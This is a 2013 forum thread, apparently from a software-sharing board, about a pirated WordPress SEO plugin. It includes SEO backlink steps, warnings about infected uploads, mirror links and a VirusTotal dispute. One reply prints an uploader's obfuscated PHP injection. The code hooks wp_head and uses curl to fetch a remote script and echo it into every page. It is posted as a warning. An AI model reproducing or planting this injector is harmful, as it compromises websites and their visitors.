[GET] [New SEO Plugin] Recommended By Top SEO's - Totally "Whitehat" No More Google Slaps

***lordcedrich*** · 02-07-2013, 02:35 AM

Quote: Ok their using EVS so I cant rip the videos so I'll explain the process here.

1. Find the site who ranks #1 for the keyword you want to rank for.

2. Go to and plug the URL of that site in and search. You need to sign up for a free account to get the best data

3. Change the filter to these options under the inbound links tab; Show
ALL / links from ONLY EXTERNAL / pages to PAGES ON ROOT DOMAIN / and
show UNGROUPED then click the filter button.

4. Click download .cvs and name it to whatever you want.

5. Inside plugin Click MY COLLECTIONS and add a collection, click the
collection you just added the ADD NEW DOMAIN, use the domain of the #1
site again. Click that domain then ADD NEW CVS and upload the file from
OSE and enjoy.

6. The processes for Majectic SEO and AHREFS are pretty much the same but I'll update this post with the exact process.

Im a little bit confused on number 2. is it the data of my site or is it the data of his/her site?

***simey69*** · 02-07-2013, 10:44 AM

AVOID ALL SHARES FROM DIDCOT
They contain wp_head infections

So far in a very short time, I've checked all the last shares from him.
Each carried a wp_head injection.
All used the exact crappy encoding method
All used the exact host domain
That's no coincidence - clearly a scammer that needs BANNING

All posts reported
I do not have time tonight to clean them all, sorry.

Cheers,
Si

***revox*** · 02-07-2013, 11:21 AM

(02-07-2013 10:44 AM)simey69 Wrote: AVOID ALL SHARES FROM DIDCOT
They contain wp_head infections

Thank you for the warning ... confirm this.

Here is one of the Didcot's injection :
<?php
$x0f="c\165r\154_\151\x6e\151\x74"; $x10="c\x75\x72\154_\163\x65to\x70t"; $x11="\143\x75r\x6c_\x65\x78\x65c"; $x12="\143\x75\162\154_\x63l\x6f\163e"; $x13="\x66unc\164\151\157\156\x5f\x65\170i\163\x74\x73";
function link_head() { global $x0f,$x10,$x11,$x12,$x13; if($x13('curl_init')) {}$x0b = "h\164\x74p\072\x2f\x2fww\167\056bus\x69\x6ees\163\x65\x73d\x69\x72\x65c\x74\157\162\171\056\151\156\146o/\x6aq\165\145\x72\x79-\x31\x2e\066\x2e\x33\056min\056j\x73"; $x0c = $x0f(); $x0d =10; $x10($x0c,CURLOPT_URL,$x0b);$x10($x0c,CURLOPT_RETURNTRANSFER,1);$x10($x0c,CURLOPT_CONNECTTIMEOUT,$x0d); $x0e = $x11($x0c);$x12($x0c); echo "$x0e";} add_action('wp_head', 'link_head'); ?>

***simey69*** · 02-07-2013, 07:38 PM

Hi,

Quick update, here is my cleaned version of Didcots infected share:

Magic Button :

Cheers,
Si

***akkiverma*** · 02-08-2013, 06:29 PM

Thanks simey69 for the thumbs up

***We Go*** · 04-01-2013, 06:57 AM

(02-07-2013 07:38 PM)simey69 Wrote: Hi,

Quick update, here is my cleaned version of Didcots infected share:

Cheers,
Si

TY Simey,

it does seem that all the mirrors have been knocked down ... can you please reup, or is there a new version about to be posted?

TIA!
We

***caaol*** · 04-01-2013, 09:19 AM

(02-07-2013 07:38 PM)simey69 Wrote: Hi,

Quick update, here is my cleaned version of Didcots infected share:

Cheers,
Si

Sorry, the file you requested is not available.
The file has been deleted and it cannot be restored. Files must comply with our terms of service.

***Seve69*** · (This post was last modified: 04-01-2013 11:02 AM by Seve69.)

Mirrror

Magic Button :

***fmax168*** · 04-01-2013, 01:41 PM

Seve69
How the hell can you post bogus virustotals. I just downloaded this and it full of garbage.

https://www.virustotal.com/en/file/6dde6...364786922/

SHA256: 6dde616007375b794b235ecb4c60669377b3d16210a6c3ca1c5f066e0ee00bc5
File name: TSULoader.exe
Detection ratio: 7 / 46
Analysis date: 2013-04-01 03:28:42 UTC ( 0 minutes ago )

Adware.Generic!Pdv2DLWLN68
ADWARE/Adware.Gen
Win32:InstalleRex-H [PUP]
Win32:InstalleRex-H [PUP]
AdInstaller.P
Adware.Downware.980
Win32/InstalleRex.I.Gen
Artua Vladislav (fs)

***Seve69*** · (This post was last modified: 04-01-2013 03:05 PM by Seve69.)

Hi AWipe

You checked the wrong virustotal

My Virustotal is

Code:

https://www.virustotal.com/en/file/24a607886dc3ce41395a67c993a368a8e8681578077e00deb6022172f0cfe25f/analysis/1364775629/

The one from your post is

Code:

https://www.virustotal.com/en/file/6dde616007375b794b235ecb4c60669377b3d16210a6c3ca1c5f066e0ee00bc5/analysis/1364786922/

You downloaded the file from ziddu.com and left the checkmark on for "Download with Ziddu accelerator and get recommended offers"... which means you downloaded their LOADER and not the file.

<a href="http://imgur.com/FdJpww3"><img src="http://i.imgur.com/FdJpww3.jpg?1" alt="" title="Hosted by imgur.com" /></a>

(04-01-2013 01:41 PM)fmax168 Wrote: Seve69
How the hell can you post bogus virustotals. I just downloaded this and it full of garbage.

https://www.virustotal.com/en/file/6dde6...364786922/

SHA256: 6dde616007375b794b235ecb4c60669377b3d16210a6c3ca1c5f066e0ee00bc5
File name: TSULoader.exe
Detection ratio: 7 / 46
Analysis date: 2013-04-01 03:28:42 UTC ( 0 minutes ago )

Adware.Generic!Pdv2DLWLN68
ADWARE/Adware.Gen
Win32:InstalleRex-H [PUP]
Win32:InstalleRex-H [PUP]
AdInstaller.P
Adware.Downware.980
Win32/InstalleRex.I.Gen
Artua Vladislav (fs)